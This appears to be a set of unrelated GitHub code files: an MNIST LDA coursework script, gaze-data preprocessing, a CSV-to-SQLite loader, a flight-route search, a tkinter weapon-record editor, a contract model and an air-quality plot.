@Author : NusLuoKe\n\n'''\nApply LDA to reduce data dimensionality from 784 to 2, 3 and 9. Visualize distribution of the\ndata with dimensionality of 2 and 3 respectively (similar to PCA). Report the classification accuracy\nfor data with dimensions of 2, 3 and 9 respectively, based on nearest neighbor classifier.\nTest the maximal dimensionality that data can be projected to via LDA. Explain the reasons.\n'''\nimport numpy as np\nfrom keras.datasets import mnist\nfrom numpy import linalg\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import KNeighborsClassifier\n\n# Load MNIST data\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\nx_train = X_train.reshape(X_train.shape[0], 28 * 28 * 1)\nx_test = X_test.reshape(X_test.shape[0], 28 * 28 * 1)\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\n# normalize pixel values to [0, 1]\nx_train = x_train / 255.\nx_test = x_test / 255.\n\n# Get statistical facts\n# Total mean vector\nmu_train = np.sum(x_train, axis=0) / 60000\nmu_test = np.sum(x_test, axis=0) / 10000\n\n# Get the matrix for each class respectively\nimg_0_train, img_1_train, img_2_train, img_3_train, img_4_train, img_5_train, img_6_train, img_7_train, img_8_train, img_9_train = [], [], [], [], [], [], [], [], [], []\nfor i in range(60000):\n if y_train[i] == 0:\n img_0_train.append(x_train[i])\n elif y_train[i] == 1:\n img_1_train.append(x_train[i])\n elif y_train[i] == 2:\n img_2_train.append(x_train[i])\n elif y_train[i] == 3:\n img_3_train.append(x_train[i])\n elif y_train[i] == 4:\n img_4_train.append(x_train[i])\n elif y_train[i] == 5:\n img_5_train.append(x_train[i])\n elif y_train[i] == 6:\n img_6_train.append(x_train[i])\n elif y_train[i] == 7:\n img_7_train.append(x_train[i])\n elif y_train[i] == 8:\n img_8_train.append(x_train[i])\n else:\n img_9_train.append(x_train[i])\n\nimg_0_train = np.array(img_0_train)\nimg_1_train = np.array(img_1_train)\nimg_2_train = np.array(img_2_train)\nimg_3_train = np.array(img_3_train)\nimg_4_train = np.array(img_0_train)\nimg_5_train = np.array(img_5_train)\nimg_6_train = np.array(img_6_train)\nimg_7_train = np.array(img_7_train)\nimg_8_train = np.array(img_8_train)\nimg_9_train = np.array(img_9_train)\n\n# Put all the 10 classes in a list\nimg_trian = []\nimg_trian.append(img_0_train)\nimg_trian.append(img_1_train)\nimg_trian.append(img_2_train)\nimg_trian.append(img_3_train)\nimg_trian.append(img_4_train)\nimg_trian.append(img_5_train)\nimg_trian.append(img_6_train)\nimg_trian.append(img_7_train)\nimg_trian.append(img_8_train)\nimg_trian.append(img_9_train)\n\n# initialize s_w and s_b\ns_w_train = 0\ns_b_train = 0\n\nfor i in range(10):\n # Class specific mean vector\n mu_i_train = np.mean(img_trian[i], axis=0)\n\n # Class - specific covariance(scatter) matrix\n zero_mean_train_classed_train = img_trian[i] - mu_i_train\n s_i_train = (1 / img_trian[i].shape[0]) * np.matmul(zero_mean_train_classed_train.transpose(),\n zero_mean_train_classed_train)\n # Within - class scatter\n p_i_train = img_trian[i].shape[0] / 60000\n s_w_i_train = p_i_train * s_i_train\n s_w_train += s_w_i_train\n\n # Between - class scatter\n mu_temp_train_ = mu_i_train - mu_train\n mu_temp_train = mu_temp_train_.reshape(784, 1)\n s_b_i_train = np.matmul(mu_temp_train, mu_temp_train.transpose()) * p_i_train\n s_b_train += s_b_i_train\n\n# calculate inv(s_w)*s_b\ntemp = np.matmul(np.linalg.pinv(s_w_train), s_b_train)\n\n# # Get eigenvalue and eigenvector of the covariance matrix\neig_val_train, eig_vect_train = linalg.eig(np.mat(temp))\n\n# Sort the eigenvalue from largest to smallest\nsorted_eig_val_train = np.argsort(eig_val_train)[::-1]\n\n# @@@@@@@@@@@@@@@@@@@@ N=2 start@@@@@@@@@@@@@@@@@@@@@@@\nn2_eig_val_train_index = sorted_eig_val_train[0:2] # take the index of the top n values\n# Get the desired eigen vectors and low dimensional data\nn2_eig_vect_train = eig_vect_train[:, n2_eig_val_train_index]\nx2_train = np.matmul(x_train, n2_eig_vect_train)\nx2_test = np.matmul(x_test, n2_eig_vect_train)\n\nmodel = KNeighborsClassifier(n_neighbors=1)\nmodel.fit(x2_train, y_train)\n\n# evaluate the model and update the accuracies list\nscore = model.score(x2_test, y_test)\nprint(\"reduce the dimensionality of raw data from 784 to 2, accuracy=%.2f%%\" % (score * 100))\n# @@@@@@@@@@@@@@@@@@@@ N=2 end@@@@@@@@@@@@@@@@@@@@@@@@@\n\n# @@@@@@@@@@@@@@@@@@@@ N=3 start@@@@@@@@@@@@@@@@@@@@@@@\nn3_eig_val_train_index = sorted_eig_val_train[0:3] # take the index of the top n values\n# Get the desired eigen vectors and low dimensional data\nn3_eig_vect_train = eig_vect_train[:, n3_eig_val_train_index]\nx3_train = np.matmul(x_train, n3_eig_vect_train)\nx3_test = np.matmul(x_test, n3_eig_vect_train)\n\nmodel = KNeighborsClassifier(n_neighbors=1)\nmodel.fit(x3_train, y_train)\n\n# evaluate the model and update the accuracies list\nscore = model.score(x3_test, y_test)\nprint(\"reduce the dimensionality of raw data from 784 to 3, accuracy=%.2f%%\" % (score * 100))\n# @@@@@@@@@@@@@@@@@@@@ N=3 end@@@@@@@@@@@@@@@@@@@@@@@@@\n\n\n# @@@@@@@@@@@@@@@@@@@@ N=9 start@@@@@@@@@@@@@@@@@@@@@@@\nn9_eig_val_train_index = sorted_eig_val_train[0:9] # take the index of the top n values\n# Get the desired eigen vectors and low dimensional data\nn9_eig_vect_train = eig_vect_train[:, n9_eig_val_train_index]\nx9_train = np.matmul(x_train, n9_eig_vect_train)\nx9_test = np.matmul(x_test, n9_eig_vect_train)\n\nmodel = KNeighborsClassifier(n_neighbors=1)\nmodel.fit(x9_train, y_train)\n\n# evaluate the model and update the accuracies list\nscore = model.score(x9_test, y_test)\nprint(\"reduce the dimensionality of raw data from 784 to 9, accuracy=%.2f%%\" % (score * 100))\n# @@@@@@@@@@@@@@@@@@@@ N=9 end@@@@@@@@@@@@@@@@@@@@@@@@@\n\n# @@@@@@@@@@@@@@@@@@@@ N=10 start@@@@@@@@@@@@@@@@@@@@@@@\nn10_eig_val_train_index = sorted_eig_val_train[0:10] # take the index of the top n values\n# Get the desired eigen vectors and low dimensional data\nn10_eig_vect_train = eig_vect_train[:, n10_eig_val_train_index]\nx10_train = np.matmul(x_train, n10_eig_vect_train)\nx10_test = np.matmul(x_test, n10_eig_vect_train)\n\nmodel = KNeighborsClassifier(n_neighbors=1)\nmodel.fit(x10_train, y_train)\n\n# evaluate the model and update the accuracies list\nscore = model.score(x10_test, y_test)\nprint(\"reduce the dimensionality of raw data from 784 to 10, accuracy=%.2f%%\" % (score * 100))\n# @@@@@@@@@@@@@@@@@@@@ N=10 end@@@@@@@@@@@@@@@@@@@@@@@@@\n\n# @@@@@@@@@@@@@@@@@@@@ N=11 start@@@@@@@@@@@@@@@@@@@@@@@\nn11_eig_val_train_index = sorted_eig_val_train[0:11] # take the index of the top n values\n# Get the desired eigen vectors and low dimensional data\nn11_eig_vect_train = eig_vect_train[:, n11_eig_val_train_index]\nx11_train = np.matmul(x_train, n11_eig_vect_train)\nx11_test = np.matmul(x_test, n11_eig_vect_train)\n\nmodel = KNeighborsClassifier(n_neighbors=1)\nmodel.fit(x11_train, y_train)\n\n# evaluate the model and update the accuracies list\nscore = model.score(x11_test, y_test)\nprint(\"reduce the dimensionality of raw data from 784 to 11, accuracy=%.2f%%\" % (score * 100))\n# @@@@@@@@@@@@@@@@@@@@ N=11 end@@@@@@@@@@@@@@@@@@@@@@@@@\n\n##############################visulize the projection#########################################\nimg_0_train_2d, img_1_train_2d, img_2_train_2d, img_3_train_2d = [], [], [], []\nimg_4_train_2d, img_5_train_2d, img_6_train_2d = [], [], []\nimg_7_train_2d, img_8_train_2d, img_9_train_2d = [], [], []\n\nimg_0_train_3d, img_1_train_3d, img_2_train_3d, img_3_train_3d = [], [], [], []\nimg_4_train_3d, img_5_train_3d, img_6_train_3d = [], [], []\nimg_7_train_3d, img_8_train_3d, img_9_train_3d = [], [], []\nfor i in range(60000):\n if y_train[i] == 0:\n img_0_train_2d.append(x2_train[i])\n img_0_train_3d.append(x3_train[i])\n elif y_train[i] == 1:\n img_1_train_2d.append(x2_train[i])\n img_1_train_3d.append(x3_train[i])\n elif y_train[i] == 2:\n img_2_train_2d.append(x2_train[i])\n img_2_train_3d.append(x3_train[i])\n elif y_train[i] == 3:\n img_3_train_2d.append(x2_train[i])\n img_3_train_3d.append(x3_train[i])\n elif y_train[i] == 4:\n img_4_train_2d.append(x2_train[i])\n img_4_train_3d.append(x3_train[i])\n elif y_train[i] == 5:\n img_5_train_2d.append(x2_train[i])\n img_5_train_3d.append(x3_train[i])\n elif y_train[i] == 6:\n img_6_train_2d.append(x2_train[i])\n img_6_train_3d.append(x3_train[i])\n elif y_train[i] == 7:\n img_7_train_2d.append(x2_train[i])\n img_7_train_3d.append(x3_train[i])\n elif y_train[i] == 8:\n img_8_train_2d.append(x2_train[i])\n img_8_train_3d.append(x3_train[i])\n else:\n img_9_train_2d.append(x2_train[i])\n img_9_train_3d.append(x3_train[i])\n\nimg_0_train_2d_ = np.array(img_0_train_2d)\nimg_1_train_2d_ = np.array(img_1_train_2d)\nimg_2_train_2d_ = np.array(img_2_train_2d)\nimg_3_train_2d_ = np.array(img_3_train_2d)\nimg_4_train_2d_ = np.array(img_0_train_2d)\nimg_5_train_2d_ = np.array(img_5_train_2d)\nimg_6_train_2d_ = np.array(img_6_train_2d)\nimg_7_train_2d_ = np.array(img_7_train_2d)\nimg_8_train_2d_ = np.array(img_8_train_2d)\nimg_9_train_2d_ = np.array(img_9_train_2d)\n\nimg_0_train_2d = img_0_train_2d_.reshape(img_0_train_2d_.shape[0], img_0_train_2d_.shape[2])\nimg_1_train_2d = img_1_train_2d_.reshape(img_1_train_2d_.shape[0], img_1_train_2d_.shape[2])\nimg_2_train_2d = img_2_train_2d_.reshape(img_2_train_2d_.shape[0], img_2_train_2d_.shape[2])\nimg_3_train_2d = img_3_train_2d_.reshape(img_3_train_2d_.shape[0], img_3_train_2d_.shape[2])\nimg_4_train_2d = img_4_train_2d_.reshape(img_4_train_2d_.shape[0], img_4_train_2d_.shape[2])\nimg_5_train_2d = img_5_train_2d_.reshape(img_5_train_2d_.shape[0], img_5_train_2d_.shape[2])\nimg_6_train_2d = img_6_train_2d_.reshape(img_6_train_2d_.shape[0], img_6_train_2d_.shape[2])\nimg_7_train_2d = img_7_train_2d_.reshape(img_7_train_2d_.shape[0], img_7_train_2d_.shape[2])\nimg_8_train_2d = img_8_train_2d_.reshape(img_8_train_2d_.shape[0], img_8_train_2d_.shape[2])\nimg_9_train_2d = img_9_train_2d_.reshape(img_9_train_2d_.shape[0], img_9_train_2d_.shape[2])\n\nimg_0_train_3d_ = np.array(img_0_train_3d)\nimg_1_train_3d_ = np.array(img_1_train_3d)\nimg_2_train_3d_ = np.array(img_2_train_3d)\nimg_3_train_3d_ = np.array(img_3_train_3d)\nimg_4_train_3d_ = np.array(img_4_train_3d)\nimg_5_train_3d_ = np.array(img_5_train_3d)\nimg_6_train_3d_ = np.array(img_6_train_3d)\nimg_7_train_3d_ = np.array(img_7_train_3d)\nimg_8_train_3d_ = np.array(img_8_train_3d)\nimg_9_train_3d_ = np.array(img_9_train_3d)\n\nimg_0_train_3d = img_0_train_3d_.reshape(img_0_train_3d_.shape[0], img_0_train_3d_.shape[2])\nimg_1_train_3d = img_1_train_3d_.reshape(img_1_train_3d_.shape[0], img_1_train_3d_.shape[2])\nimg_2_train_3d = img_2_train_3d_.reshape(img_2_train_3d_.shape[0], img_2_train_3d_.shape[2])\nimg_3_train_3d = img_3_train_3d_.reshape(img_3_train_3d_.shape[0], img_3_train_3d_.shape[2])\nimg_4_train_3d = img_4_train_3d_.reshape(img_4_train_3d_.shape[0], img_4_train_3d_.shape[2])\nimg_5_train_3d = img_5_train_3d_.reshape(img_5_train_3d_.shape[0], img_5_train_3d_.shape[2])\nimg_6_train_3d = img_6_train_3d_.reshape(img_6_train_3d_.shape[0], img_6_train_3d_.shape[2])\nimg_7_train_3d = img_7_train_3d_.reshape(img_7_train_3d_.shape[0], img_7_train_3d_.shape[2])\nimg_8_train_3d = img_8_train_3d_.reshape(img_8_train_3d_.shape[0], img_8_train_3d_.shape[2])\nimg_9_train_3d = img_9_train_3d_.reshape(img_9_train_3d_.shape[0], img_9_train_3d_.shape[2])\n\n# plot figure\nplt.figure()\nplt.title(\"the first 3000 projected training data vector in 2d\")\na0 = plt.scatter(img_0_train_2d[0:3000, 0].real, img_0_train_2d[0:3000, 1].real, c='r', marker='.')\na1 = plt.scatter(img_1_train_2d[0:3000, 0].real, img_1_train_2d[0:3000, 1].real, c='g', marker='x')\na2 = plt.scatter(img_2_train_2d[0:3000, 0].real, img_2_train_2d[0:3000, 1].real, c='b', marker='+')\na3 = plt.scatter(img_3_train_2d[0:3000, 0].real, img_3_train_2d[0:3000, 1].real, c='c', marker='.')\na4 = plt.scatter(img_4_train_2d[0:3000, 0].real, img_4_train_2d[0:3000, 1].real, c='m', marker='x')\na5 = plt.scatter(img_5_train_2d[0:3000, 0].real, img_5_train_2d[0:3000, 1].real, c='y', marker='+')\na6 = plt.scatter(img_6_train_2d[0:3000, 0].real, img_6_train_2d[0:3000, 1].real, c='k', marker='.')\na7 = plt.scatter(img_7_train_2d[0:3000, 0].real, img_7_train_2d[0:3000, 1].real, c='orange', marker='x')\na8 = plt.scatter(img_8_train_2d[0:3000, 0].real, img_8_train_2d[0:3000, 1].real, c='indigo', marker='+')\na9 = plt.scatter(img_9_train_2d[0:3000, 0].real, img_9_train_2d[0:3000, 1].real, c='peru', marker='.')\nplt.legend([a0, a1, a2, a3, a4, a5, a6, a7, a8, a9], ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'],\n loc='best')\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nplt.title(\"the first 3000 projected training data vector in 3d\")\na0 = ax.scatter(img_0_train_3d[0:3000, 0].real, img_0_train_3d[0:3000, 1].real, img_0_train_3d[0:3000, 2].real, c='r',\n marker='.')\na1 = ax.scatter(img_1_train_3d[0:3000, 0].real, img_1_train_3d[0:3000, 1].real, img_1_train_3d[0:3000, 2].real, c='g',\n marker='+')\na2 = ax.scatter(img_2_train_3d[0:3000, 0].real, img_2_train_3d[0:3000, 1].real, img_2_train_3d[0:3000, 2].real, c='b',\n marker='x')\na3 = ax.scatter(img_3_train_3d[0:3000, 0].real, img_3_train_3d[0:3000, 1].real, img_3_train_3d[0:3000, 2].real, c='c',\n marker='.')\na4 = ax.scatter(img_4_train_3d[0:3000, 0].real, img_4_train_3d[0:3000, 1].real, img_4_train_3d[0:3000, 2].real, c='m',\n marker='+')\na5 = ax.scatter(img_5_train_3d[0:3000, 0].real, img_5_train_3d[0:3000, 1].real, img_5_train_3d[0:3000, 2].real, c='y',\n marker='x')\na6 = ax.scatter(img_6_train_3d[0:3000, 0].real, img_6_train_3d[0:3000, 1].real, img_6_train_3d[0:3000, 2].real, c='k',\n marker='.')\na7 = ax.scatter(img_7_train_3d[0:3000, 0].real, img_7_train_3d[0:3000, 1].real, img_7_train_3d[0:3000, 2].real,\n c='orange', marker='+')\na8 = ax.scatter(img_8_train_3d[0:3000, 0].real, img_8_train_3d[0:3000, 1].real, img_8_train_3d[0:3000, 2].real,\n c='indigo', marker='x')\na9 = ax.scatter(img_9_train_3d[0:3000, 0].real, img_9_train_3d[0:3000, 1].real, img_9_train_3d[0:3000, 2].real,\n c='peru', marker='.')\nplt.legend([a0, a1, a2, a3, a4, a5, a6, a7, a8, a9], ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'],\n loc='best')\nplt.show()\n","repo_name":"NusLuoKe/NUS_EE5907","sub_path":"CA2/lda.py","file_name":"lda.py","file_ext":"py","file_size_in_byte":14626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"36558186373","text":"import os\n\nimport cv2 as cv\nimport numpy as np\nimport scipy.io as sio\nimport argparse\n\n\ndef parser_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--data', type=str, default='res/data/extract/MPIIGaze/Data/Normalized')\n parser.add_argument('--out', type=str, default='res/data/out.npz')\n return parser.parse_args()\n\n\ndef __read_mat(path_mat):\n content = sio.loadmat(path_mat, struct_as_record=False, squeeze_me=True)\n data = content['data']\n return data\n\n\ndef __convert_pose(vect):\n M, _ = cv.Rodrigues(np.array(vect).astype(np.float32))\n vec = M[:, 2]\n phi = np.arctan2(vec[0], vec[2])\n theta = np.arcsin(vec[1])\n return np.array([theta, phi])\n\n\ndef __convert_gaze(vect):\n x, y, z = vect\n phi = np.arctan2(-x, -z)\n theta = np.arcsin(-y)\n return np.array([theta, phi])\n\n\ndef __get_data(path_data):\n images = []\n poses = []\n gazes = []\n\n for patient in os.listdir(path_data):\n full_path_patient = os.path.join(path_data, patient)\n for day_name in os.listdir(full_path_patient):\n full_day_path = os.path.join(full_path_patient, day_name)\n print('Read data from: ', full_day_path)\n\n content = __read_mat(full_day_path)\n\n left_images = content.left.image\n left_poses = content.left.pose\n left_gazes = content.left.gaze\n\n right_images = content.right.image\n right_poses = content.right.pose\n right_gazes = content.right.gaze\n\n if left_images.shape == (36, 60):\n left_images = left_images[np.newaxis, :, :]\n left_gazes = left_gazes[np.newaxis, :]\n left_poses = left_poses[np.newaxis, :]\n\n if right_images.shape == (36, 60):\n right_images = right_images[np.newaxis, :, :]\n right_gazes = right_gazes[np.newaxis, :]\n right_poses = right_poses[np.newaxis, :]\n\n for i in np.arange(0, len(left_gazes), 1):\n\n images.append(left_images[i])\n images.append(right_images[i])\n\n poses.append(__convert_pose(left_poses[i]))\n poses.append(__convert_pose(right_poses[i]))\n\n gazes.append(__convert_gaze(left_gazes[i]))\n gazes.append(__convert_gaze(right_gazes[i]))\n\n return images, poses, gazes\n\n\nargs = parser_args()\nimg, pss, gzs = __get_data(args.data)\nnp.savez(args.out, image=img, pose=pss, gaze=gzs)\n","repo_name":"YOUlfey/mpiigaze-cnn","sub_path":"gaze-preprocess.py","file_name":"gaze-preprocess.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"86"} +{"seq_id":"14507212651","text":"import pandas as pd\nimport csv\n\n\n\nclass DB_Creator_SQLite():\n\n def __init__(self, database):\n self.database = database\n self.conn = self.database.conn\n self.engine = self.database.sqlalchemy_engine()\n\n def load_from_csv(self, csv_path, tablename, columns=None, dtypes=None):\n\n if columns is None:\n with open(csv_path, 'r') as infile:\n reader = csv.DictReader(infile)\n columns = reader.fieldnames[1:]\n\n if dtypes is None: # if no dtypes set, then everything is a string\n dtypes = {k: str for k in columns}\n\n df = pd.read_csv(csv_path, index_col=0, dtype=dtypes)\n\n if 'SMILES' in df.columns: # make SMILES lowercase if necessary\n df.rename(columns={\"SMILES\": \"smiles\"}, inplace=True)\n\n self._data_to_table(df, tablename)\n self._create_index(tablename, 'smiles')\n\n def _data_to_table(self, df, table):\n print(\"data to sqlite..\")\n df.to_sql(table, con=self.engine, index_label='id', if_exists='replace')\n print('done')\n\n def _create_index(self, table, col_for_index):\n cursor = self.conn.cursor()\n cmd = f\"CREATE INDEX {table}_idx_{col_for_index} ON {table} ({col_for_index});\"\n cursor.execute(cmd)\n self.conn.commit()\n cursor.close()\n print('done')\n\n\nif __name__ == '__main__':\n db_creator = DB_Creator_SQLite(None)\n #db_creator.load_from_csv('building_blocks_final.csv', 'building_blocks')\n #db_creator.load_from_csv('metabolites_final.csv', 'metabolites')\n\n","repo_name":"willfinnigan/retrobiocat-db","sub_path":"retrobiocat_web/retro/retrosynthesis_engine/mols_and_reactions/sqlite_source_mol/create_sqlitedb.py","file_name":"create_sqlitedb.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"8496574371","text":"# Komşuluk matrisi\nadjacency_matrix = [\n # A B C D E\n [0, 0, 1, 0, 1], # A\n [1, 0, 0, 0, 1], # B\n [0, 0, 0, 1, 1], # C\n [0, 1, 0, 0, 1], # D\n [1, 1, 1, 1, 0] # E\n]\n\n# Şehir isimlerini tutan liste\ncities = ['A', 'B', 'C', 'D', 'E']\n\n# Doğrudan uçuşları bulan fonksiyon\ndef find_direct_flights(origin):\n index = cities.index(origin)\n direct_flights = [cities[i] for i in range(len(cities)) if adjacency_matrix[index][i] == 1]\n return direct_flights\n\n# Dolaylı uçuşları bulan yardımcı fonksiyon\ndef find_indirect_flights_helper(current_city, destination, visited, flight_path, flights):\n if current_city == destination:\n flights.append(flight_path)\n return\n\n visited.add(current_city)\n\n for i in range(len(cities)):\n if adjacency_matrix[cities.index(current_city)][i] == 1 and cities[i] not in visited:\n find_indirect_flights_helper(cities[i], destination, visited.copy(), flight_path + [cities[i]], flights)\n\n# Dolaylı uçuşları bulan fonksiyon\ndef find_indirect_flights(origin, destination):\n flights = []\n find_indirect_flights_helper(origin, destination, set(), [origin], flights)\n return flights\n\n# Kullanıcıdan giriş alıp doğrudan ve dolaylı uçuşları bulan bölüm\ndef main():\n origin = input(\"Başlangıç şehri girin: \")\n destination = input(\"Varış şehri girin: \")\n\n # Doğrudan uçuşları bul ve ekrana yazdır\n direct_flights_result = find_direct_flights(origin)\n if direct_flights_result:\n print(f\"Doğrudan uçuşlar: {direct_flights_result}\")\n else:\n print(f\"{origin} şehrinden doğrudan uçuş bulunmamaktadır.\")\n\n # Dolaylı uçuşları bul ve ekrana yazdır\n indirect_flights_result = find_indirect_flights(origin, destination)\n if indirect_flights_result:\n print(\"Dolaylı uçuşlar:\")\n for flight in indirect_flights_result:\n print(\" -> \".join(flight))\n\nif __name__ == \"__main__\":\n main()\n ","repo_name":"ibrahimfevzi/cpp-learning-journey","sub_path":"amadeus/ders.py","file_name":"ders.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"5164224006","text":"import tkinter as tk\r\nfrom tkinter import messagebox\r\nimport requests\r\nimport re\r\nimport json\r\n\r\n\r\nclass UpdateSwordPopup(tk.Frame):\r\n \"\"\" Popup Frame to Add a Sword \"\"\"\r\n\r\n def __init__(self, parent, id, close_callback):\r\n \"\"\" Constructor \"\"\"\r\n\r\n self._id = id\r\n url = \"http://127.0.0.1:5000/weaponwarehouse/weapons/\" + id\r\n response = requests.get(url)\r\n\r\n sword = json.loads(response.content)\r\n\r\n tk.Frame.__init__(self, parent)\r\n self._close_cb = close_callback\r\n self.grid(rowspan=2, columnspan=3)\r\n\r\n tk.Label(self, text=\"Name:\").grid(row=3, column=1)\r\n name_text = tk.StringVar()\r\n name_text.set(sword[\"name\"])\r\n self._name = tk.Entry(self, textvariable=name_text)\r\n self._name.grid(row=3, column=2)\r\n\r\n tk.Label(self, text=\"Materials:\").grid(row=4, column=1)\r\n materials_text = tk.StringVar()\r\n materials_text.set(sword[\"materials\"])\r\n self._materials = tk.Entry(self, textvariable=materials_text)\r\n self._materials.grid(row=4, column=2)\r\n\r\n tk.Label(self, text=\"Cold Weapon:\").grid(row=5, column=1)\r\n self._is_cold_weapon = tk.BooleanVar()\r\n radio1 = tk.Radiobutton(self, text=\"Yes\", value=True, variable=self._is_cold_weapon)\r\n radio1.grid(row=5, column=2)\r\n radio2 = tk.Radiobutton(self, text=\"No\", value=False, variable=self._is_cold_weapon)\r\n radio2.grid(row=5, column=3)\r\n self._is_cold_weapon.set(sword[\"is_cold_weapon\"])\r\n\r\n tk.Label(self, text=\"Inuse:\").grid(row=6, column=1)\r\n self._is_inuse = tk.BooleanVar()\r\n radio3 = tk.Radiobutton(self, text=\"Yes\", value=True, variable=self._is_inuse)\r\n radio3.grid(row=6, column=2)\r\n radio4 = tk.Radiobutton(self, text=\"No\", value=False, variable=self._is_inuse)\r\n radio4.grid(row=6, column=3)\r\n self._is_inuse.set(sword[\"is_inuse\"])\r\n\r\n tk.Label(self, text=\"Manufacture Date:\").grid(row=7, column=1)\r\n manufacture_date_text = tk.StringVar()\r\n manufacture_date_text.set(sword[\"manufacture_date\"])\r\n self._manufacture_date = tk.Entry(self, textvariable=manufacture_date_text)\r\n self._manufacture_date.grid(row=7, column=2)\r\n\r\n tk.Label(self, text=\"Sharp:\").grid(row=8, column=1)\r\n sharp_float = tk.DoubleVar()\r\n sharp_float.set(sword[\"sharp\"])\r\n self._sharp = tk.Entry(self, textvariable=sharp_float)\r\n self._sharp.grid(row=8, column=2)\r\n\r\n tk.Label(self, text=\"Length:\").grid(row=9, column=1)\r\n length_float = tk.DoubleVar()\r\n length_float.set(sword[\"length\"])\r\n self._length = tk.Entry(self, textvariable=length_float)\r\n self._length.grid(row=9, column=2)\r\n\r\n tk.Label(self, text=\"Double Edged:\").grid(row=10, column=1)\r\n self._is_double_edged = tk.BooleanVar()\r\n radio5 = tk.Radiobutton(self, text=\"Yes\", value=True, variable=self._is_double_edged)\r\n radio5.grid(row=10, column=2)\r\n radio6 = tk.Radiobutton(self, text=\"No\", value=False, variable=self._is_double_edged)\r\n radio6.grid(row=10, column=3)\r\n self._is_double_edged.set(sword[\"is_double_edged\"])\r\n\r\n tk.Button(self, text=\"Submit\", command=self._submit_cb).grid(row=11, column=1)\r\n tk.Button(self, text=\"Close\", command=self._close_cb).grid(row=11, column=2)\r\n\r\n def _submit_cb(self):\r\n \"\"\" Submit the Add sword \"\"\"\r\n\r\n # Validate the non-string data values\r\n if re.match(\"^\\d{4}-\\d{2}-\\d{2}$\", self._manufacture_date.get()) is None:\r\n messagebox.showerror(\"Error\", \"Received date must have format yyyy-mm-dd\")\r\n return\r\n\r\n if re.match(\"^\\s*(?=.*[1-9])\\d*(?:\\.\\d{1,2})?\\s*$\", self._sharp.get()) is None:\r\n messagebox.showerror(\"Error\", \"Range must be a valid float\")\r\n return\r\n\r\n if re.match(\"^\\s*(?=.*[1-9])\\d*(?:\\.\\d{1,2})?\\s*$\", self._length.get()) is None:\r\n messagebox.showerror(\"Error\", \"Range must be a valid float\")\r\n return\r\n\r\n # Create the dictionary for the JSON request body\r\n data = {}\r\n data['name'] = self._name.get()\r\n data['materials'] = self._materials.get()\r\n data['is_cold_weapon'] = self._is_cold_weapon.get()\r\n data['is_inuse'] = int(self._is_inuse.get())\r\n data['manufacture_date'] = self._manufacture_date.get()\r\n data['sharp'] = self._sharp.get()\r\n data['length'] = self._length.get()\r\n data['is_double_edged'] = self._is_double_edged.get()\r\n data['type'] = \"Sword\"\r\n\r\n self._update_sword(data)\r\n\r\n # Implement your code here\r\n def _update_sword(self, data):\r\n \"\"\" update a sword to the backend grid \"\"\"\r\n url = \"http://127.0.0.1:5000/weaponwarehouse/weapons/\" + self._id\r\n headers = {\"content-type\": \"application/json\"}\r\n response = requests.put(url, json=data, headers=headers)\r\n\r\n if response.status_code == 200:\r\n self._close_cb()\r\n else:\r\n messagebox.showerror(\"Error\", \"Cannot update sword because: \" + response.text)\r\n self.focus_get()\r\n","repo_name":"JIAJUNATBCIT/Warehouse-App","sub_path":"update_sword_popup.py","file_name":"update_sword_popup.py","file_ext":"py","file_size_in_byte":5154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"7484499588","text":"from models.TGTime import TGTime\n\n\nclass PersonalityWorkContract(object):\n def __init__(self, start_t: TGTime, end_t: TGTime, worker_id: str,\n receiver_company_id: str,\n receiver_property_id: str,\n work_days: list[int],\n one_time_payment: int,\n salary_monthly: int,\n provider_company_id: str = None,\n provider_property_id: str = None,):\n self.start_t = start_t\n self.end_t = end_t\n self.worker_id = worker_id\n self.provider_company_id = provider_company_id\n self.provider_property_id = provider_property_id\n self.receiver_company_id = receiver_company_id\n self.receiver_property_id = receiver_property_id\n self.work_days = work_days\n self.one_time_payment = one_time_payment\n self.salary_monthly = salary_monthly\n","repo_name":"SierraW/TradingGameServer","sub_path":"models/cities/personality/PersonalityWorkContract.py","file_name":"PersonalityWorkContract.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"14975495973","text":"import matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport datetime as dt\nimport matplotlib\nimport csv\n\nmatplotlib.use(\"AGG\")\n\nx = []\neCO2 = []\nTVOC = []\n\npath = \"data/\" + \"2021-07-03_air_quality.csv\"\n\nwith open(path, 'r') as csvfile:\n lines = csv.reader(csvfile, delimiter=',')\n # Skip header\n next(lines)\n for row in lines:\n x.append(row[0])\n eCO2.append(int(row[1]))\n TVOC.append(int(row[2]))\n\n\nformat = \"%H:%M:%S\"\nxfmt = mdates.DateFormatter(\"%H:%M\")\n\n\ndef convertTime(time):\n return dt.datetime.strptime(time, format)\n\n\ntimes = list(map(convertTime, x))\n\nfig, axs = plt.subplots(2, 1)\n\ncoPlot = axs[0]\nvocPlot = axs[1]\n\ncoPlot.plot(times, eCO2, color='g', linestyle='solid',\n label=\"CO2\", marker=\"\")\nvocPlot.plot(times, TVOC, color='g', linestyle='solid',\n marker='', label=\"TVOC\")\n\ncoPlot.xaxis.set_major_formatter(xfmt)\nvocPlot.xaxis.set_major_formatter(xfmt)\n\ncoPlot.axhline(500)\nvocPlot.axhline(50)\ncoPlot.set(ylabel=\"eCO2 (ppm)\")\nvocPlot.set(ylabel='TVOC (ppb)', xlabel=\"Tid\")\ncoPlot.set_title('2021-07-03', 